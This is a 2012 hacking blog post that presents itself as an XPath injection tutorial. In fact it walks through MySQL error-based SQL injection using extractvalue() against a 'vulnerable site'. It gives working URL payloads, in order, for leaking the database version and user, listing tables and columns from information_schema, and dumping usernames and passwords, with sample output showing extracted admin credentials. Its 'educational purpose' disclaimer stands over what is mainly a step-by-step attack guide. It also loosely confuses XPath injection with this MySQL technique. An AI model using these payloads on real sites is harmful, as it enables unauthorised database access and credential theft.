Thursday, November 29, 2012

Hack Websites Using XPath Injection


NOTE: ONLY FOR EDUCATIONAL PURPOSE. IT IS TOTALLY ILLEGAL AND YOU WILL BE PUNISHED. SO DONT TRY.

XPath Injection:
SQL is the most popular type of code injection attack, there are several others that can be just as dangerous to your applications and your data, including LDAP injection and XPath injection. An ‘XPath injection’ attack is similar to an SQL injection attack, but its target is an XML document rather than an SQL database. ‘XPath Injection’ is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
What is XML?
XML stands for Extensible Markup Language and was designed to describe data. It allows programmers to create their own customized tags to store data. In XML the data is stored in nodes in a tree form. XML Path or XPath language is used for querying information from the nodes of an XML document. Please refer to XML Tutorial for more details on XML.
What is XPath?
“XML Path” or “XPath” 1.0 is a language used to refer to parts of an XML document. Path expressions are used to access elements and attributes in an XML document, which return a node-set, a string, a Boolean or a number. It can be used directly to query an XML document by an application, or as part of a larger operation such as applying an XSLT transformation to an XML document, or applying an XQuery to an XML document. Please refer to XPath Tutorial for more details on XPath.
In Detail:
Code Injection is a technique to Inject code into a program or application code by taking advantage of the unchecked assumptions the application makes about its inputs to bypass or modify the originally intended functionality of the code. All code injection attacks work in a same way; an attacker injects malicious code into the application code through an input field of the application. So, to perform such attacks there must be entry points that are not performing adequate validation.
Consider a Web application that uses XPath to query an XML document to retrieve the social security number of a customer by passing name and password values that are supplied by the user of the application. If the application embeds these values directly in the XPath query then it is vulnerable to XPath Injection.
OK, so when to use it? Let us assume we have found a vulnerable site that appears to be vulnerable from our usual quick tests, but when we try to inject using ORDER BY we get no errors generated. We double check using String injection method to make sure that it is not the problem, but still no results. Time to give up? Never, let us now try to see if we might be able to use XPATH injection.
34392415.png (800×224)
We will start with a quick check to confirm versioning to ensure this method can be used, as it only works on MySQL version >=5.1 (best with errors present). The first check for version and user looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))—
RESULT: ’Xpath syntax error: version info:user info’
63361066.png (800×190)
OK, so now we have confirmation that this method will work as clearly displayed in the errors seen. We now have the version and current user info. Now we will move to checking the table info, like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))–
RESULT: ’Xpath syntax error: <Table Name Found at address used in LIMIT statement>’
95976832.png (800×194)
This is the biggest problem with XPATH Injection, it gets tricky here. You will need to use the LIMIT statement to sort your results and keep traffic of all of the table names found. This can be very time consuming, but it is key that you use your brain to pick up on any relationships that become obvious as you are sorting through tables, while also keeping an eye out for juicy tables that may warrant further investigation in future steps. I suggest first sorting them to find the lower and upper limits so you know what type of range you are working with (some sites will be only a few and others will have thousands in total – see example below).
53807123.png (800×185)
24698245.png (790×800)
Once you have determined the table info, you will need to follow similar steps to pull the column details. It works very similar to tables and looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 0,1)))–
RESULT: ‘Xpath syntax error: <column name found at address used in LIMIT statement>’
39102492.png (800×185)
This is just as time consuming as the pulling the table names and is a bit tricky as it becomes very hard to tell what columns link to what tables or database for that matter, for this reason it is key to use your brain power to make some logical determinations about what you find. This means you can use your brain to deduce that you have found a table named mysql_auth_users and columns idx, username, and password. It would not be a great stretch to assume these might go together. I tend to use a bit of trial and error on this last part but have found if you just think about it for a minute you can usually make the necessary connections to extract what you want. That being said, extraction of data works the exact same as it does for simple SQLi. You choose the columns you want and indicate what table to pull from and parse the results from the error given. It looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,idx,0x3a,username,0x3a,password) from mysql_auth_usr)))–
RESULT:  Xpath syntax error: ‘:1:admin:password1’
101ld.png (800×215)
Now you have successfully injected and extracted the data using XPATH injection! Now go pat yourself on the back for learning a new method and enjoy a well-deserved break ;) There are other XPATH queries that can be used but this is the one I have found the best results with. You can also use updatexml(). I will continue to add to this as I investigate this technique more, but this concludes my write up on XPATH injection using the EXTRACTVLAUE() method for now. I hope you have found this interesting and educational and as always until next time Enjoy!

No comments: